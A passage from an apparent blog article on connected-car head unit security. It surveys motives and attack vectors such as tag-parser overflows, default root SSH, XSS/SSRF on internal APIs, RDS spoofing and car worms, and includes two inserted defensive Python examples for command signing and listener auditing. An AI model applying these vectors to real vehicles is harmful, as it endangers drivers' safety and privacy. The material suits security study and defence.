<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 4) Suitable for remote attack.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In the fanciest cars the HU runs many applications and has many Internet connections, let alone USB, Bluetooth and Wi-Fi. So it is easier to attack the HU than an ECU directly, because a variety of attack vectors exist for the HU, including attacks from the Internet.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/3d4/c93/01c/3d4c9301cef74d1280204e0b900bfeaf.jpg" height="365px;" src="https://lh4.googleusercontent.com/0uuBz33yu28OJbbHmCY124HQVSeo4CcQTXPDkB7Swk9N9VUbZp50-bmVz8gvslXce6wUl9iMApb7vDeukQr1VxE4GI7ruF3twJ7GLtwl_bRp9nEYDuXGpttW7Ryil0XozVTIKqXj1n4ilAeT" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="620px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Car security is similar to APC/SCADA security except that our PLCs (ECUs) are connected to a smartphone (HU) with Internet access.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Summarizing all my “analytics”, I can conclude that the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HU is the most desired and useful target</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, but for sure there are many other possibilities, like the baseband GSM modem, wireless TPMS, direct access to CAN (local attack), attacks on sensors and radars and so on. In other words, car security includes not only IoT security.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">What would be the use?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Before we go on I would like to raise a good question: why would anyone in the world be interested in hacking our long-suffering car? There are several possibilities:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1) Spying on a specific person. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">For example, someone wants to spy on all of a person's movements without any taps. After all, taps only duplicate car functionality: GPS, GSM, Wi-Fi and BT. The only thing needed is to install software, and that can be done remotely. I think that the price of such an attack is still too high, but for sure the car system’s architecture and design give such an opportunity. Besides, a ConnectedCar can be attacked from the Internet without physical interaction with the car (I will return to this theme a little bit later). And as I don't want to produce many paragraphs, I will also add unauthorized access to car payment features to this point.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2) Devastating actions</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This point is rather uncertain, but imagine ABS being turned off at a specific moment - it is rather dangerous. Imagine another dangerous scenario: all car electronics are disabled by a railgun at high speed during a sharp turn. Such things have already happened by accident (electromagnetic interference from base stations was at fault). We can possibly get the same results if we disable an ECU programmatically. But of course such a scenario is better suited to some action movie.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">3) Unauthorized physical access</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Car theft is a rather obvious vector, but it is more connected with local physical attacks and local network vulnerabilities. Nevertheless, a MiTM attack that allows opening car doors has been shown in practice.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's talk about vectors that are not so obvious:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">4) Route tampering.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Self-driving cars are still at the testing and revision stage, but even without this super-feature we can tamper with a route if the driver trusts everything the navigator says. So if the navigator says that the road is closed or there is a traffic jam and it's better to choose another route, the driver might follow its advice.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">5) "Locker"</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">When we discussed these issues at the 21st DefconRussia meetup - </span><a href="http://www.slideshare.net/AlexeySintsov/backdooring-a-car" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.slideshare.net/AlexeySintsov/backdooring-a-car</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, the "locker" idea of monetisation was put forward jokingly. Imagine you get into the car, start it and see ransom demands on a hell-red screen to send money in order for the HU to be unlocked. Funny that a "locker" can really lock the doors and windows of your car :). In the case of some popular vulnerability or unscrupulous MRO centres this scheme might work.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">That's enough for a start; I think it’s easy to invent even more good applications.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Attack vectors on HU</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this part we will talk about attack schemes. Mind you, I will describe them in theory, but many of them have been applied in practice. I can't talk about that part of my work because of an NDA, but I will review the types of attack vectors to make you aware of possible attacks in theory. Let's start with the HU structure. Usually it is a box connected to various boards, displays and sensors that contains a GSM/3G modem, card/USB plug, Bluetooth device, etc. Inside the box there are RAM, ROM and a CPU, usually on an ARM chip. It runs a fancy OS that controls navigation, some cabin elements (for example, door locks or window lifters), video/mp3 elements and sometimes even has a web browser. I'd like to add that the HU may vary from one manufacturer to another and from one generation to another. Some of them have several CPUs and OSs, some even have a hypervisor and an OS with all user data virtualized. I am certain that the German auto industry follows a course of protecting crucial car resources from user processes, but this path is thorny. In the simplest case there will be only a general-purpose OS, but as I have mentioned, the HU is still isolated at the network level.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/f91/371/808/f91371808056409c94c7855f40f75c1a.jpg" height="443px;" src="https://lh5.googleusercontent.com/sqBn9U-7Lt-dPXErSJ-5lN_AGDcFxhQQQvkN9cRzOW1oPLi4rsOWW4VVwxa8mGir2tES0TlGSDi0ovqKGUVW6EhDz_KdrXoV3GIPtrevG9aJzkCJiPwPONWsaWOSmaRgOb3TiEAzEpp7imZA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The OS type can vary; I've already mentioned QNX, Linux, etc. A real-time OS is not necessary for IVI if there are no specific tasks requiring it (and such tasks are rare), but QNX is used by several manufacturers (HARMAN is a striking example). GENIVI and Tizen are examples of manufacturers that use Linux.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's talk about network-level isolation. The HU is connected to OBD, which is connected to a switch. Usually it also has access to the audio and phone systems (the MOST bus is used here) and sometimes direct connections to some ECUs via CAN. Where should the attacker direct their efforts in order to hack the HU?</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Local interfaces.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Let's start with the simplest: local interfaces allow us to interact with OS services and applications. This vector seems doubtful, since the attacker must somehow get access to these interfaces. But it should be taken into account that many "secrets" are hidden on the client's device; certificates and passwords can be shared and can be default for all devices of that system class. Yes, the Security Through Obscurity approach is widespread in the car industry :). Besides this, you can perform a hybrid attack on local interfaces: the source of the attack can be remote, but penetration happens on the local HU. For example, you have downloaded an mp3 file with tags (that contain a BoF exploit), loaded it into the HU and played it. The BoF hits the tag parser and the backdoor is installed (here is the example - </span><a href="http://www.itworld.com/article/2748225/security/with-hacking--music-can-take-control-of-your-car.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.itworld.com/article/2748225/security/with-hacking--music-can-take-control-of-your-car.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">). Card updates, POI and fake updates can be used similarly as well. 
Besides "file parsing error" attacks there are some interesting ways to exploit errors in the logic of update installation, for example, updates for navigation maps. The local interfaces concept applies to Bluetooth, USB and the Wi-Fi hotspot (yes, such a feature exists too!), not only to files and import. EthernetOverUSB has also turned out to be a very popular solution. In other words, USB plays the role of an Ethernet interface to the local Ethernet network of the car. One can connect via SSH as root (remember that the password is default) and it's all over. The same goes for the Wi-Fi hotspot: once the HU creates such a hotspot it can open an SSH port for connection. And I'll repeat that these are not just guesses, anyone can check that (for example, Toyota and Mazda fans have already found such a hack - </span><a href="http://www.mazda3hacks.com/doku.php?id=notes:sshnotes" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.mazda3hacks.com/doku.php?id=notes:sshnotes</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">). I have seen that in other vendors' cars too. So I'm waiting for hackers to find more of this, and for sure they will!</span></div>
<b id="docs-internal-guid-2ccdc29c-bc7b-6e97-61dc-11d7f28f4e69" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Attack via applications in the name of IoT.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The most interesting vector (for me) is an attack from the Internet. There is a large number of opportunities and it is constantly growing. Let’s start with the classical client-side attack on the browser and its plugins. Yes, it's trendy now to have a browser in the car which can read PDFs and Word documents! It could be a WebKit build or Chrome, so you can see the common problems and difficulties. In addition, in some cases the browser can be run as root. That's OK (except running the browser as root, I refuse to understand it). Besides the web browser, there are also many applications that use the Internet and services like Facebook or navigation.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> I would like to say some words about HTML5 security and WEB technologies: somehow they were made "embedded" and have become the basis for all ConnectedCar operation logic. And now imagine the consequences of SSRF/CSRF or XSS. Suppose the HU interface and other applications are based on HTML+JS; if there is an XSS, we can get access to the internal API: get the car location, VIN, fuelling, current speed and other sensor data which is available through the API. If we have SSRF/CSRF we can interact with the internal API and control some things inside the car (if not an ECU, then navigation logic, profiles and applications) or develop attacks on internal components (privilege escalation). It is rather unpleasant, taking into account that ConnectedCar services include remote manipulation and access to data.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let's take up the recent case of BMW hacking - </span><a href="http://m.heise.de/ct/artikel/Beemer-Open-Thyself-Security-vulnerabilities-in-BMW-s-ConnectedDrive-2540957.html" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://m.heise.de/ct/artikel/Beemer-Open-Thyself-Security-vulnerabilities-in-BMW-s-ConnectedDrive-2540957.html</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The problem was that the crucial traffic was encrypted with a symmetric-key algorithm, and the key could be retrieved using reverse engineering methods. The key was the same for all cars (a shared secret), so once you get the key from one car you can confidently use it on other cars. In addition, all commands were sent over HTTP; SSL was not used. That allows spoofing, emulating the door-opening command and performing MiTM attacks. You can read more if you follow the link.</span></div>
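<div dir="ltr">The design fix for the shared-secret problem described above, as an added example (not code from the original post and not BMW's protocol): each vehicle gets its own key derived from a backend master secret and its VIN, every command carries a MAC and a monotonic counter, and the receiver verifies before parsing. The message layout, the VINs and the master secret are constructed for the illustration; transport encryption (TLS) is assumed to be added separately.</div>

```python
import hashlib
import hmac
import json


def derive_vehicle_key(master_secret: bytes, vin: str) -> bytes:
    """HKDF-SHA256 (RFC 5869) extract + one expand block, with the VIN as info.

    The master secret stays in the backend; a head unit only ever stores the
    key derived for its own VIN, so dumping one unit reveals one key.
    """
    prk = hmac.new(b"hu-cmd-v1", master_secret, hashlib.sha256).digest()
    return hmac.new(prk, vin.encode() + b"\x01", hashlib.sha256).digest()


def sign_command(vehicle_key: bytes, vin: str, counter: int, action: str) -> dict:
    """Backend side: serialise the command canonically and attach an HMAC tag."""
    body = json.dumps({"vin": vin, "ctr": counter, "action": action},
                      sort_keys=True, separators=(",", ":"))
    tag = hmac.new(vehicle_key, body.encode(), hashlib.sha256).hexdigest()
    return {"body": body, "tag": tag}


class VehicleReceiver:
    """Head-unit side: authenticate first, then check VIN binding and freshness."""

    def __init__(self, vin: str, vehicle_key: bytes):
        self.vin = vin
        self._key = vehicle_key
        self.last_counter = 0  # would live in persistent storage on a real unit

    def accept(self, msg: dict) -> str:
        body = str(msg.get("body", "")).encode()
        expected = hmac.new(self._key, body, hashlib.sha256).hexdigest()
        # Constant-time comparison; nothing from the body is parsed before this.
        if not hmac.compare_digest(expected.encode(), str(msg.get("tag", "")).encode()):
            return "reject: bad tag"
        fields = json.loads(body)
        if fields.get("vin") != self.vin:
            return "reject: wrong vehicle"
        ctr = fields.get("ctr")
        if not isinstance(ctr, int) or ctr <= self.last_counter:
            return "reject: replay"
        self.last_counter = ctr
        return "accept: " + str(fields.get("action"))


def demo() -> dict:
    master = bytes(range(32))                         # constructed master secret
    vin_a, vin_b = "CONSTRUCTEDVIN000A", "CONSTRUCTEDVIN000B"
    key_a = derive_vehicle_key(master, vin_a)         # key recovered from car A
    key_b = derive_vehicle_key(master, vin_b)
    car_b = VehicleReceiver(vin_b, key_b)

    results = {}
    legit = sign_command(key_b, vin_b, 1, "unlock_doors")
    results["legit"] = car_b.accept(legit)
    results["replay"] = car_b.accept(legit)           # same message captured and resent
    # Command for car B signed with the key taken from car A.
    results["key_from_other_car"] = car_b.accept(
        sign_command(key_a, vin_b, 2, "unlock_doors"))
    # Body altered in transit after signing (plain-HTTP MiTM case).
    tampered = sign_command(key_b, vin_b, 3, "lock_doors")
    tampered["body"] = tampered["body"].replace("lock_doors", "unlock_doors")
    results["tampered"] = car_b.accept(tampered)
    return results


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:20s} {verdict}")
```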
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/91a/30a/c37/91a30ac375e646e9a41770bf863f8e78.png" height="424px;" src="https://lh5.googleusercontent.com/dj5XJZqFMDJjl7zkjKliTmJGyX6Vtxb3itS5MgHmpO5mBmkKtKtM6cBCKrD9CP6sbqJuScsxwf0Z8rkD5vsDEzj7LaUFLCI3wzSWW4y529z8LT3f3WzXxIu3wcHOyOJoubpVBRf0AVypnWPU" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Various attack vectors</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> RDS Spoofing</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> RDS/TMC parsing is often performed by the navigation software in the HU. The most popular problem is obvious spoofing - </span><a href="https://www.blackhat.com/presentations/bh-usa-07/Barisani_and_Bianco/Presentation/bh-usa-07-barisani_and_bianco.pdf" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.blackhat.com/presentations/bh-usa-07/Barisani_and_Bianco/Presentation/bh-usa-07-barisani_and_bianco.pdf</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. TMC data is not encrypted and is transferred as is (the problem is solved only for "commercial" radio stations, where private keys are used). Thus any hacker with a HackRF can spoof broadcast traffic reports. You can also do some fuzzing and use vulnerabilities in format parsing. TMC is an unhappy target for fuzzing, but there is a nonzero probability of finding something like a BoF in Radio Text.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> v2v</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I'd also like to say something about v2v technology. I like the idea of a worm that copies itself from one car to another. For example, Wi-Fi (IEEE 802.11p) may be the way to implement it. I hope that by the time it is widely distributed they will learn not to bind services’ interfaces to 0.0.0.0 and not to open SSH ports, otherwise interesting worm samples will be created :)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/5b3/f21/b95/5b3f21b951b64a2595a0de82b29d5266.jpg" height="390px;" src="https://lh3.googleusercontent.com/qooY20JUpD3IykCP-L-5FpN8O-sX12aJ003D3HLQ9IIBeblcLw8WTu2PMWzrBHhLQAjL3EhmgLqYnVSbkiSCLnjJphHV-36tLxxcFT8xjL2VvhjdOJdtzJBVgyAdhFjAc84tqT2uZuGvb-zd" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The dream of a future virus maker...</span></div>
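<div dir="ltr">A check an HU integrator can run against the unit's own socket table to catch the two mistakes named in the local-interfaces and v2v passages above: services bound to 0.0.0.0, and SSH listening on an address reachable over USB-Ethernet or the Wi-Fi hotspot. This is an added example, not code from the original post; it assumes a Linux-based, little-endian HU that exposes /proc/net/tcp, and the sample table is constructed.</div>

```python
import socket
import struct

TCP_LISTEN = 0x0A   # state code used in /proc/net/tcp for listening sockets
SSH_PORT = 22

# Constructed sample in /proc/net/tcp layout (IPv4 only; tcp6 is not covered here).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1
   1: 0100007F:1388 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1
   2: 0101A8C0:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1
   3: 0101A8C0:0016 0201A8C0:C350 01 00000000:00000000 00:00000000 00000000     0        0 1004 1
bogus truncated
"""


def parse_listeners(proc_net_tcp: str) -> list:
    """Return (ip, port) for every socket in LISTEN state.

    The address column is the kernel's 32-bit value printed as hex, so on a
    little-endian CPU the bytes come out reversed (0100007F is 127.0.0.1).
    Header and malformed lines are skipped rather than raising.
    """
    listeners = []
    for line in proc_net_tcp.splitlines():
        parts = line.split()
        if len(parts) < 4 or ":" not in parts[1]:
            continue
        try:
            addr_hex, port_hex = parts[1].split(":")
            ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
            port = int(port_hex, 16)
            state = int(parts[3], 16)
        except (ValueError, struct.error):
            continue
        if state == TCP_LISTEN:
            listeners.append((ip, port))
    return listeners


def audit_listeners(proc_net_tcp: str, allowed_wildcard_ports=frozenset()) -> list:
    """Flag wildcard binds and SSH exposed off-loopback.

    allowed_wildcard_ports is a hypothetical allow-list for services that are
    meant to be reachable on every interface; it is empty by default.
    """
    findings = []
    for ip, port in parse_listeners(proc_net_tcp):
        reasons = []
        if ip == "0.0.0.0" and port not in allowed_wildcard_ports:
            reasons.append("bound to all interfaces")
        if port == SSH_PORT and not ip.startswith("127."):
            reasons.append("SSH reachable off-loopback")
        if reasons:
            findings.append((ip, port, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for ip, port, reasons in audit_listeners(SAMPLE_PROC_NET_TCP):
        print(f"{ip}:{port}  " + "; ".join(reasons))
```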
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hybrid worm</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">While we were talking about car worms at DefconRussia, other funny vectors were presented, like exploiting software in car service centres (MRO). Imagine that, while the technician is examining the car, the car infects the technician's workstation using vulnerabilities in car diagnostic software. The next client arrives at the service centre and now the technician infects his or her car. I'd like to add that an IVI/HU of one family and generation can be installed in different cars (even from different vendors), which makes our hypothetical worm's task much easier.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Internet services security is also an interesting subject. If you control the Internet proxy of a ConnectedCar, or its API backend located on the Internet, then you control all ConnectedCar traffic: updates, registration and other features. Once again, ConnectedCar and HU security issues are similar to mobile security. </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
